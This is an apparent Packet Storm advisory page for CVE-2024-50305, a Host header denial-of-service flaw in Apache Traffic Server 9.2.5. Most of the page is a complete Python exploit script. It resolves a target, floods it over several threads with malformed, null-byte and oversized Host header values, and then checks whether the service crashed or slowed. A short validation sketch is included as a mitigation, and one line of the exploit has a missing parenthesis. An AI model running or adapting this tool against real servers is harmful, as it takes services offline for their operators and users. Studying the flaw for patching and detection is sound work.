📄 Apache Traffic Server 9.2.5 Denial of Service

🗓️ 20 Feb 2026 · Reported by indoushka · Type: packetstorm · 🔗 packetstorm.news

Apache Traffic Server DoS due to improper Host header handling (CVE-2024-50305).

=============================================================================================================================================
    | # Title     : Apache Traffic Server Host Header Denial of Service Vulnerability                                                           |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits)                                                            |
    | # Vendor    : https://trafficserver.apache.org/                                                                                           |
    =============================================================================================================================================
    
    [+] Summary    :  CVE-2024-50305 is a denial-of-service (DoS) vulnerability in Apache Traffic Server caused by improper handling and validation of the Host header in incoming HTTP requests.
                      An attacker can send requests with crafted Host header values (abnormal, oversized, or non-standard). Under certain conditions,
                      this can cause service instability, excessive resource consumption, unexpected connection termination, or a process crash, resulting in a temporary denial of service.
                      The root cause is insufficient input validation in the HTTP request parsing logic. Recommended mitigations are boundary checks, strict Host header validation, and adherence to the relevant RFCs.
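
The strict Host header validation recommended above could look roughly like the sketch below. It is a hedged illustration only: it is not code from Apache Traffic Server and not the vendor's fix, and the names `is_acceptable_host` and `MAX_HOST_LENGTH`, as well as the 255-byte cap, are assumptions chosen for the example. It accepts only a dot-separated host name or a bracketed IPv6 literal, each with an optional numeric port, and rejects everything else.

```python
import ipaddress
import re

# Assumed upper bound for the whole Host value; tune for your deployment.
MAX_HOST_LENGTH = 255

# One DNS-style label: letters, digits, inner hyphens, at most 63 characters.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
# Dot-separated labels with an optional trailing dot (also matches IPv4 text).
_REG_NAME = re.compile(rf"{_LABEL}(?:\.{_LABEL})*\.?")


def _valid_port(port: str) -> bool:
    """Accept 1 to 5 ASCII digits in the range 1..65535."""
    return port.isdigit() and len(port) <= 5 and 1 <= int(port) <= 65535


def is_acceptable_host(value: str) -> bool:
    """Return True only for host[:port] or [ipv6-literal][:port]."""
    # Boundary check: reject empty and oversized values first.
    if not value or len(value) > MAX_HOST_LENGTH:
        return False
    # Reject control characters, whitespace, NUL, and non-ASCII bytes.
    if any(ord(ch) < 0x21 or ord(ch) > 0x7E for ch in value):
        return False

    if value.startswith("["):
        # Bracketed IPv6 literal, optionally followed by ":port".
        end = value.find("]")
        if end == -1:
            return False
        literal, rest = value[1:end], value[end + 1:]
        try:
            ipaddress.IPv6Address(literal)
        except ValueError:
            return False
        return rest == "" or (rest.startswith(":") and _valid_port(rest[1:]))

    # Plain host name or IPv4 address, optionally followed by ":port".
    host, sep, port = value.partition(":")
    if sep and not _valid_port(port):
        return False
    return _REG_NAME.fullmatch(host) is not None
```

A filter like this would sit in front of request routing (for example in a test harness or an upstream proxy rule) and answer rejected values with a 400 response instead of passing them to the parser. Whether it covers the exact input behind CVE-2024-50305 is not something this sketch can confirm; upgrading to a fixed release remains the primary remedy.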
    
    [+] POC   :
    
    #!/usr/bin/env python3
    
    import socket
    import sys
    import time
    import argparse
    import threading
    import ssl
    import ipaddress
    import random
    import string
    from concurrent.futures import ThreadPoolExecutor, as_completed
    from typing import List, Tuple, Optional, Dict, Any
    from enum import Enum
    from dataclasses import dataclass, field
    from contextlib import contextmanager
    import logging
    from collections import Counter
    
    logging.basicConfig(
        level=logging.INFO,
        format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
        datefmt='%H:%M:%S'
    )
    logger = logging.getLogger('cve_2024_50305')
    
    class ServiceState(Enum):
        """Possible service states"""
        UP = "up"
        DOWN = "down"
        UNKNOWN = "unknown"
        FILTERED = "filtered"
        SLOW = "slow"
        ERROR = "error"
    
    class Protocol(Enum):
        """Connection protocol"""
        HTTP1 = "http/1.1"
        HTTP2 = "http/2"
        UNKNOWN = "unknown"
    
    class CrashConfidence(Enum):
        """Confidence level in crash detection"""
        HIGH = "high"     
        MEDIUM = "medium" 
        LOW = "low"       
        NONE = "none"     
    
    @dataclass
    class RequestResult:
        """Result of a single request"""
        payload: str
        response_time: float
        status_code: Optional[int] = None
        crash_confidence: CrashConfidence = CrashConfidence.NONE
        error: Optional[str] = None
        timeout_occurred: bool = False
        bytes_received: int = 0
        connection_reset: bool = False
    
    @dataclass
    class Statistics:
        """Attack statistics - optimized to avoid memory growth"""
        total_requests: int = 0
        crashes_high: int = 0
        crashes_medium: int = 0
        crashes_low: int = 0
        timeouts: int = 0
        connection_refused: int = 0
        connection_reset: int = 0
        successful: int = 0
        errors: int = 0
        status_codes: Counter = field(default_factory=Counter)
        # Response time stats - stored compactly
        response_time_sum: float = 0.0
        response_time_count: int = 0
        response_time_min: float = float('inf')
        response_time_max: float = 0.0
    
    class HTTPResponseParser:
        """HTTP response parser"""
        
        @staticmethod
        def parse_status_line(data: bytes) -> Tuple[Optional[int], Optional[Protocol]]:
            """
            Parses the first status line of an HTTP response
            """
            if not data:
                return None, None
    
            end_of_line = data.find(b'\r\n')
            if end_of_line == -1:
                return None, None
                
            first_line = data[:end_of_line].decode('ascii', errors='ignore')
            parts = first_line.split(' ')
            
            if len(parts) < 2:
                return None, None
    
            protocol = Protocol.UNKNOWN
            if parts[0].startswith('HTTP/1'):
                protocol = Protocol.HTTP1
            elif parts[0].startswith('HTTP/2'):
                protocol = Protocol.HTTP2
    
            try:
                status_code = int(parts[1])
                return status_code, protocol
            except (ValueError, IndexError):
                return None, protocol
    
    class TargetResolver:
        """Resolves target addresses with IPv4/IPv6 support"""
        
        def __init__(self, prefer_ipv6: bool = False):
            self.prefer_ipv6 = prefer_ipv6
            self._cache = {}
            
        def _is_ip_address(self, target: str) -> Tuple[bool, Optional[int]]:
            """
            Checks if the text is an IP address and returns its family
            Returns: (is_ip, family)
            """
            try:
                ip_obj = ipaddress.ip_address(target)
                if ip_obj.version == 6:
                    return True, socket.AF_INET6
                else:
                    return True, socket.AF_INET
            except ValueError:
                return False, None
        
        def resolve(self, target: str, port: int) -> Optional[Tuple[str, int, int]]:
            """
            Resolves target to (ip, port, family)
            
            Returns:
                (ip, port, socket_family) or None on failure
            """
            cache_key = f"{target}:{port}:{self.prefer_ipv6}"
            if cache_key in self._cache:
                return self._cache[cache_key]
    
            is_ip, ip_family = self._is_ip_address(target)
            if is_ip:
                result = (target, port, ip_family)
                self._cache[cache_key] = result
                return result
    
            if self.prefer_ipv6:
                families = [socket.AF_INET6, socket.AF_INET]
            else:
                families = [socket.AF_INET, socket.AF_INET6]
                
            for family in families:
                try:
                    addrinfo = socket.getaddrinfo(
                        target, 
                        port, 
                        family=family,
                        type=socket.SOCK_STREAM,
                        proto=socket.IPPROTO_TCP
                    )
                    
                    if addrinfo:
    
                        _, _, _, _, sockaddr = addrinfo[0]
                        if family == socket.AF_INET6:
                            ip, port, flowinfo, scopeid = sockaddr
                        else:
                            ip, port = sockaddr
                        
                        result = (ip, port, family)
                        self._cache[cache_key] = result
                        logger.debug(f"Resolved {target} -> {ip} ({'IPv6' if family == socket.AF_INET6 else 'IPv4'})")
                        return result
                        
                except socket.gaierror:
                    continue
                except Exception as e:
                    logger.debug(f"Error resolving {target} using family {family}: {e}")
                    continue
                    
            logger.error(f"Failed to resolve {target}")
            return None
    
    class ServiceChecker:
        """Accurate service status checker"""
        
        def __init__(self, timeout: float = 5, max_header_size: int = 8192):
            self.timeout = timeout
            self.max_header_size = max_header_size
            
        @contextmanager
        def _create_socket(self, family: int, use_ssl: bool = False, hostname: str = None):
            """Creates a socket with SSL support"""
            sock = socket.socket(family, socket.SOCK_STREAM)
            sock.settimeout(self.timeout)
            
            try:
                if use_ssl:
                    context = ssl.create_default_context()
                    context.check_hostname = False
                    context.verify_mode = ssl.CERT_NONE
    
                    is_ip = False
                    if hostname:
                        try:
                            ipaddress.ip_address(hostname)
                            is_ip = True
                        except ValueError:
                            pass
    
                    server_hostname = hostname if hostname and not is_ip else None
                    sock = context.wrap_socket(sock, server_hostname=server_hostname)
                yield sock
            finally:
                try:
                    sock.close()
                except:
                    pass
        
        def _is_valid_http_response(self, data: bytes) -> Tuple[bool, Optional[int]]:
            """Checks validity of HTTP response and extracts status code"""
            status_code, _ = HTTPResponseParser.parse_status_line(data)
            return status_code is not None, status_code
        
        def check(self, ip: str, port: int, family: int, 
                  hostname: str = None, use_ssl: bool = False) -> Tuple[ServiceState, float, Optional[int]]:
            """
            Performs a detailed service check
            
            Returns:
                (State, Response Time, Status Code)
            """
            start_time = time.monotonic()
            
            try:
                with self._create_socket(family, use_ssl, hostname or ip) as sock:
    
                    host_header = hostname or ip
                    if family == socket.AF_INET6 and ':' in ip and not ip.startswith('['):
                        host_header = f"[{ip}]"
                    
                    request = (
                        f"GET / HTTP/1.1\r\n"
                        f"Host: {host_header}\r\n"
                        f"User-Agent: CVE-2024-50305-Checker/1.0\r\n"
                        f"Accept: text/html,application/xhtml+xml\r\n"
                        f"Accept-Language: en-US,en;q=0.9\r\n"
                        f"Connection: close\r\n"
                        f"\r\n"
                    ).encode()
    
                    if family == socket.AF_INET6:
                        sock.connect((ip, port, 0, 0))
                    else:
                        sock.connect((ip, port))
    
                    sock.sendall(request)
    
                    response = b""
                    while True:
                        try:
                            chunk = sock.recv(self.max_header_size)
                            if not chunk:
                                break
                            response += chunk
    
                            if b'\r\n\r\n' in response:
                                break
    
                            if len(response) > self.max_header_size:
                                break
                        except socket.timeout:
                            break
                    
                    response_time = time.monotonic() - start_time
    
                    is_valid, status_code = self._is_valid_http_response(response)
                    
                    if is_valid and status_code is not None:
                        if 200 <= status_code < 600:  
                            return ServiceState.UP, response_time, status_code
                        else:
                            return ServiceState.UP, response_time, status_code
                    elif response:
                        return ServiceState.UNKNOWN, response_time, None
                    else:
                        return ServiceState.UNKNOWN, response_time, None
                        
            except socket.timeout:
                return ServiceState.SLOW, self.timeout, None
            except ConnectionRefusedError:
                return ServiceState.DOWN, 0, None
            except ConnectionResetError:
                return ServiceState.UNKNOWN, time.monotonic() - start_time, None
            except socket.gaierror:
                return ServiceState.ERROR, 0, None
            except Exception as e:
                logger.debug(f"Check Error: {e}")
                return ServiceState.ERROR, 0, None
    
    class RequestSender:
        """Sends malicious requests with detailed result analysis"""
        
        def __init__(self, timeout: float = 5, max_response_size: int = 4096):
            self.timeout = timeout
            self.max_response_size = max_response_size
            
        @contextmanager
        def _create_socket(self, family: int):
            """Creates a socket"""
            sock = socket.socket(family, socket.SOCK_STREAM)
            sock.settimeout(self.timeout)
            try:
                yield sock
            finally:
                try:
                    sock.close()
                except:
                    pass
        
        def _evaluate_crash_confidence(self, result: RequestResult, 
                                       normal_behavior: Dict) -> CrashConfidence:
            """
            Evaluates crash detection confidence based on several factors
            """
    
            if result.connection_reset:
                return CrashConfidence.HIGH
    
            if result.timeout_occurred and result.bytes_received == 0:
                return CrashConfidence.MEDIUM
    
            if result.bytes_received == 0 and not result.error:
                return CrashConfidence.LOW
                
            return CrashConfidence.NONE
        
        def send(self, ip: str, port: int, family: int, 
                  host_payload: str, baseline_time: float = 1.0) -> RequestResult:
            """
            Sends a malicious request with accurate result analysis
            
            Args:
                baseline_time: Normal service response time
            """
            result = RequestResult(payload=host_payload, response_time=0.0)
            start_time = time.monotonic()
            
            try:
                with self._create_socket(family) as sock:
    
                    try:
                        if family == socket.AF_INET6:
                            sock.connect((ip, port, 0, 0))
                        else:
                            sock.connect((ip, port))
                    except ConnectionRefusedError:
                        result.error = "connection_refused"
                        result.response_time = time.monotonic() - start_time
                        return result
    
                    try:
                        encoded_host = host_payload.encode('utf-8')
                    except UnicodeEncodeError:
                        encoded_host = host_payload.encode('ascii', errors='replace')
                    request = (
                        b"GET / HTTP/1.1\r\n"
                        b"Host: " + encoded_host + b"\r\n"
                        b"User-Agent: CVE-2024-50305/1.0\r\n"
                        b"Accept: */*\r\n"
                        b"Connection: close\r\n"
                        b"\r\n"
                    )
    
                    try:
                        sock.sendall(request)
                    except ConnectionResetError:
                        result.connection_reset = True
                        result.response_time = time.monotonic() - start_time
                        result.crash_confidence = CrashConfidence.HIGH
                        return result
                    except BrokenPipeError:
                        result.connection_reset = True
                        result.response_time = time.monotonic() - start_time
                        result.crash_confidence = CrashConfidence.HIGH
    
                    response = b""
                    try:
                        while True:
                            try:
                                chunk = sock.recv(4096)
                                if not chunk:
                                    break
                                response += chunk
    
                                if len(response) > self.max_response_size:
                                    break
                            except socket.timeout:
                                result.timeout_occurred = True
                                break
                    except ConnectionResetError:
                        result.connection_reset = True
                        result.crash_confidence = CrashConfidence.HIGH
                    
                    result.response_time = time.monotonic() - start_time
                    result.bytes_received = len(response)
    
                    if response:
                        status_code, _ = HTTPResponseParser.parse_status_line(response)
                        result.status_code = status_code
                        
                        if status_code is not None:
                            result.crash_confidence = CrashConfidence.NONE
                        else:
    
                            result.crash_confidence = CrashConfidence.LOW
                    if result.crash_confidence == CrashConfidence.NONE:
                        result.crash_confidence = self._evaluate_crash_confidence(result, {})
                        
            except Exception as e:
                result.error = str(e)
                result.response_time = time.monotonic() - start_time
                
            return result
    
    class PayloadGenerator:
        """Generates malicious Host values"""
    
        BASE_PAYLOADS = [
            ":", "::", "[::1]", "", "\0",
            "localhost:8080:extra", "host\x00injection",
        ]
        
        SPECIAL_CHARS = list(string.punctuation + string.whitespace)
        
        @classmethod
        def generate(cls, count: int = 30) -> List[str]:
            """Generates a list of payloads"""
            count = max(10, min(count, 100)) 
            
            payloads = set(cls.BASE_PAYLOADS)
    
            for length in [100, 500, 1000, 2000, 5000]:
                if len(payloads) < count:
                    payloads.add('A' * length)
                    payloads.add('B' * length)
            random_needed = count - len(payloads)
            if random_needed > 0:
                for _ in range(random_needed):
                    length = random.randint(5, 50)
                    random_payload = ''.join(random.choices(cls.SPECIAL_CHARS, k=length))
                    payloads.add(random_payload)
    
            unicode_samples = ["🚀", "测试", "αβγ", "★", "🌍"]
            payloads.update(unicode_samples[:max(0, count - len(payloads))])
            
            return list(payloads)[:count]
    
    class StatisticsCollector:
        """Thread-safe statistics collection with memory control"""
        
        def __init__(self, max_response_times: int = 1000):
            self.lock = threading.Lock()
            self.stats = Statistics()
            self.max_response_times = max_response_times
            self._response_times_sample = []  # Limited sample for analysis
            
        def add_result(self, result: RequestResult):
            """Adds a result in a thread-safe manner"""
            with self.lock:
                self.stats.total_requests += 1
    
                if result.crash_confidence == CrashConfidence.HIGH:
                    self.stats.crashes_high += 1
                elif result.crash_confidence == CrashConfidence.MEDIUM:
                    self.stats.crashes_medium += 1
                elif result.crash_confidence == CrashConfidence.LOW:
                    self.stats.crashes_low += 1
    
                if result.error == "connection_refused":
                    self.stats.connection_refused += 1
                elif result.connection_reset:
                    self.stats.connection_reset += 1
                elif result.error:
                    self.stats.errors += 1
                
                if result.timeout_occurred:
                    self.stats.timeouts += 1
                
                if result.status_code is not None:
                    self.stats.successful += 1
                    self.stats.status_codes[result.status_code] += 1
    
                if result.response_time > 0:
                    self.stats.response_time_sum += result.response_time
                    self.stats.response_time_count += 1
                    self.stats.response_time_min = min(self.stats.response_time_min, result.response_time)
                    self.stats.response_time_max = max(self.stats.response_time_max, result.response_time)
    
                    if len(self._response_times_sample) < self.max_response_times:
                        self._response_times_sample.append(result.response_time)
        
        def get_stats(self) -> Statistics:
            """Gets a copy of the statistics"""
            with self.lock:
                stats_copy = Statistics(
                    total_requests=self.stats.total_requests,
                    crashes_high=self.stats.crashes_high,
                    crashes_medium=self.stats.crashes_medium,
                    crashes_low=self.stats.crashes_low,
                    timeouts=self.stats.timeouts,
                    connection_refused=self.stats.connection_refused,
                    connection_reset=self.stats.connection_reset,
                    successful=self.stats.successful,
                    errors=self.stats.errors,
                    status_codes=self.stats.status_codes.copy(),
                    response_time_sum=self.stats.response_time_sum,
                    response_time_count=self.stats.response_time_count,
                    response_time_min=self.stats.response_time_min,
                    response_time_max=self.stats.response_time_max
                )
                return stats_copy
        
        def get_average_response_time(self) -> float:
            """Calculates average response time"""
            if self.stats.response_time_count > 0:
                return self.stats.response_time_sum / self.stats.response_time_count
            return 0.0
    
    class CVE202450305Exploit:
        """Main exploit class"""
        
        def __init__(self, target: str, port: int = 80, threads: int = 5,
                     timeout: float = 5, prefer_ipv6: bool = False,
                     use_ssl: bool = False, rate_limit: float = 0.1):
     
            if not 1 <= port <= 65535:
                raise ValueError(f"Invalid port number: {port}")
            
            if threads < 1 or threads > 100:
                raise ValueError(f"Thread count must be between 1 and 100")
            
            self.target = target
            self.port = port
            self.threads = threads
            self.timeout = timeout
            self.prefer_ipv6 = prefer_ipv6
            self.use_ssl = use_ssl
            self.rate_limit = rate_limit 
            self.resolver = TargetResolver(prefer_ipv6)
            self.checker = ServiceChecker(timeout)
            self.sender = RequestSender(timeout)
            self.stats = StatisticsCollector()
            self.target_ip = None
            self.target_family = None
            self.baseline_state = ServiceState.UNKNOWN
            self.baseline_time = 1.0  # Default value
            self.baseline_status = None
            self.is_ip_target = False
        
        def initialize(self) -> bool:
            """Initializes exploit and resolves target"""
            logger.info(f"Initializing exploit for target {self.target}:{self.port}")
    
            resolved = self.resolver.resolve(self.target, self.port)
            if not resolved:
                logger.error("Failed to resolve target")
                return False
                
            self.target_ip, _, self.target_family = resolved
    
            try:
                ipaddress.ip_address(self.target)
                self.is_ip_target = True
            except ValueError:
                self.is_ip_target = False
            
            logger.info(f"Target resolved: {self.target_ip} "
                       f"({'IPv6' if self.target_family == socket.AF_INET6 else 'IPv4'})")
    
            logger.info("Performing baseline service check...")
            state, resp_time, status = self.checker.check(
                self.target_ip, self.port, self.target_family,
                hostname=self.target if not self.is_ip_target else None, 
                use_ssl=self.use_ssl
            )
            
            self.baseline_state = state
            if resp_time > 0:
                self.baseline_time = resp_time
            self.baseline_status = status
            
            if state == ServiceState.UP:
                logger.info(f" Service is UP (Code: {status}, Time: {resp_time:.3f}s)")
                return True
            elif state == ServiceState.SLOW:
                logger.warning(f" Service is SLOW (Time: {resp_time:.3f}s)")
                return True
            elif state == ServiceState.UNKNOWN:
                logger.warning(f" Service status is UNKNOWN")
                return True
            else:
                logger.error(f" Service is NOT running: {state.value}")
                return False
        
        def _process_payload_chunk(self, payloads: List[str], iteration: int, 
                                   chunk_idx: int) -> List[RequestResult]:
            """Processes a subset of payloads"""
            results = []
            
            with ThreadPoolExecutor(max_workers=self.threads) as executor:
                future_to_payload = {}
                
                for payload in payloads:
    
                    if self.rate_limit > 0:
                        time.sleep(self.rate_limit)
                    
                    future = executor.submit(
                        self.sender.send,
                        self.target_ip,
                        self.port,
                        self.target_family,
                        payload,
                        self.baseline_time
                    )
                    future_to_payload[future] = payload
                
                for future in as_completed(future_to_payload):
                    try:
                        result = future.result(timeout=self.timeout + 2)
                        results.append(result)
                        self.stats.add_result(result)
    
                        if result.crash_confidence == CrashConfidence.HIGH:
                            logger.info(f"    HIGH confidence crash: {repr(result.payload)[:50]}...")
                        elif result.crash_confidence == CrashConfidence.MEDIUM:
                            logger.debug(f"    MEDIUM confidence: {repr(result.payload)[:50]}...")
                        elif result.connection_reset:
                            logger.debug(f"    Connection reset: {repr(result.payload)[:50]}...")
                        elif result.timeout_occurred:
                            logger.debug(f"    Timeout: {repr(result.payload)[:50]}...")
                            
                    except Exception as e:
                        logger.error(f"Error processing result: {e}")
                        
            return results
        
        def run(self, payload_count: int = 30, iterations: int = 3) -> Tuple[bool, Statistics]:
            """
            Executes the attack
            
            Returns:
                (Exploit_Success, Statistics)
            """
            logger.info("=" * 60)
            logger.info(" CVE-2024-50305 - Apache Traffic Server DoS Exploit")
            logger.info("=" * 60)
            logger.info(f"Target: {self.target} ({self.target_ip}:{self.port})")
            logger.info(f"Protocol: {'HTTPS' if self.use_ssl else 'HTTP'}")
            logger.info(f"Threads: {self.threads}, Timeout: {self.timeout}s")
            logger.info(f"Rate limit: {self.rate_limit}s")
            logger.info(f"Payloads: {payload_count}, Iterations: {iterations}")
            logger.info("=" * 60)
            payloads = PayloadGenerator.generate(payload_count)
            logger.info(f" Generated {len(payloads)} malicious Host values")
    
            all_results = []
            
            for iteration in range(iterations):
                logger.info(f"\n Iteration {iteration + 1}/{iterations}")
    
                chunk_size = max(1, len(payloads) 
                chunks = [payloads[i:i+chunk_size] for i in range(0, len(payloads), chunk_size)]
                
                for chunk_idx, chunk in enumerate(chunks):
                    logger.debug(f"   Processing chunk {chunk_idx + 1}/{len(chunks)}")
                    results = self._process_payload_chunk(chunk, iteration, chunk_idx)
                    all_results.extend(results)
    
                    stats = self.stats.get_stats()
                    logger.info(f"   Progress: {stats.total_requests}/{iterations * len(payloads)} "
                              f"(High: {stats.crashes_high}, Med: {stats.crashes_medium})")
    
                    if chunk_idx < len(chunks) - 1:
                        time.sleep(1)
    
            final_stats = self.stats.get_stats()
            avg_time = self.stats.get_average_response_time()
            
            logger.info("\n" + "=" * 60)
            logger.info(" Final Statistics:")
            logger.info(f" Total Requests: {final_stats.total_requests}")
            logger.info(f" HIGH confidence crashes: {final_stats.crashes_high}")
            logger.info(f" MEDIUM confidence crashes: {final_stats.crashes_medium}")
            logger.info(f" LOW confidence crashes: {final_stats.crashes_low}")
            logger.info(f" Timeouts: {final_stats.timeouts}")
            logger.info(f" Connection resets: {final_stats.connection_reset}")
            logger.info(f" Connection refused: {final_stats.connection_refused}")
            logger.info(f" Successful responses: {final_stats.successful}")
            
            if final_stats.status_codes:
                logger.info(f"   Status Codes: {dict(final_stats.status_codes)}")
            
            if final_stats.response_time_count > 0:
                logger.info(f"   Response Time - Avg: {avg_time:.3f}s")
                logger.info(f"   Response Time - Min: {final_stats.response_time_min:.3f}s")
                logger.info(f"   Response Time - Max: {final_stats.response_time_max:.3f}s")
            
            logger.info("=" * 60)
    
            logger.info("\n Verifying exploit success...")
            time.sleep(3)
    
            post_state, post_time, post_status = self.checker.check(
                self.target_ip, self.port, self.target_family,
                hostname=self.target if not self.is_ip_target else None,
                use_ssl=self.use_ssl
            )
            
            success = False
            reasons = []
            
            if final_stats.crashes_high > 0:
                reasons.append(f"Detected {final_stats.crashes_high} HIGH confidence crashes")
                success = True
                
            if final_stats.crashes_medium > 3:
                reasons.append(f"Detected {final_stats.crashes_medium} MEDIUM confidence crashes")
                success = True
                
            if self.baseline_state == ServiceState.UP:
                if post_state == ServiceState.DOWN:
                    reasons.append("Service stopped after attack")
                    success = True
                elif post_state == ServiceState.SLOW and self.baseline_time > 0:
                    slowdown_ratio = post_time / self.baseline_time
                    if slowdown_ratio > 3:
                        reasons.append(f"Significant service slowdown ({slowdown_ratio:.1f}x)")
                        success = True
            
            if success:
                logger.info("Exploit Successful!")
                for reason in reasons:
                    logger.info(f"   • {reason}")
                return True, final_stats
            else:
                logger.info(" Exploit Failed")
                if reasons:
                    logger.info(f"   ({', '.join(reasons)})")
                else:
                    logger.info("   No evidence of vulnerability found")
                return False, final_stats
    
    
    def main():
        """Main function"""
        parser = argparse.ArgumentParser(
            description="CVE-2024-50305 - Apache Traffic Server DoS Exploit",
            formatter_class=argparse.RawDescriptionHelpFormatter
        )
        
        parser.add_argument("target", help="Target address (IP or domain)")
        parser.add_argument("-p", "--port", type=int, default=80, 
                            help="Target port (1-65535, default: 80)")
        parser.add_argument("-t", "--threads", type=int, default=5, 
                            help="Thread count (1-100, default: 5)")
        parser.add_argument("--timeout", type=float, default=5, 
                            help="Connection timeout in seconds (default: 5)")
        parser.add_argument("--ipv6", action="store_true", 
                            help="Prefer IPv6")
        parser.add_argument("--ssl", action="store_true", 
                            help="Use HTTPS/SSL")
        parser.add_argument("--rate-limit", type=float, default=0.05,
                            help="Delay between requests in seconds (default: 0.05)")
        parser.add_argument("-c", "--payloads", type=int, default=30,
                            help="Number of payloads to test (10-100, default: 30)")
        parser.add_argument("-i", "--iterations", type=int, default=3,
                            help="Number of iterations (default: 3)")
        parser.add_argument("-v", "--verbose", action="store_true", 
                            help="Show detailed information")
        
        args = parser.parse_args()
    
        if args.verbose:
            logger.setLevel(logging.DEBUG)
        
        try:
    
            exploit = CVE202450305Exploit(
                target=args.target,
                port=args.port,
                threads=args.threads,
                timeout=args.timeout,
                prefer_ipv6=args.ipv6,
                use_ssl=args.ssl,
                rate_limit=args.rate_limit
            )
            
            if not exploit.initialize():
                sys.exit(2)
                
            success, stats = exploit.run(
                payload_count=args.payloads,
                iterations=args.iterations
            )
    
            sys.exit(0 if success else 1)
            
        except KeyboardInterrupt:
            logger.info("\nAttack stopped by user")
            sys.exit(2)
        except ValueError as e:
            logger.error(f"Input Error: {e}")
            sys.exit(2)
        except Exception as e:
            logger.error(f"Unexpected Error: {e}")
            if args.verbose:
                import traceback
                traceback.print_exc()
            sys.exit(2)
    
    
    if __name__ == "__main__":
        main()
    
    	
    Greetings to :======================================================================
    jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
    ====================================================================================

Published: 20 Feb 2026 00:00
Vulners AI Score: 5.4 (Medium risk)
CVSS 3.1: 7.5
EPSS: 0.00318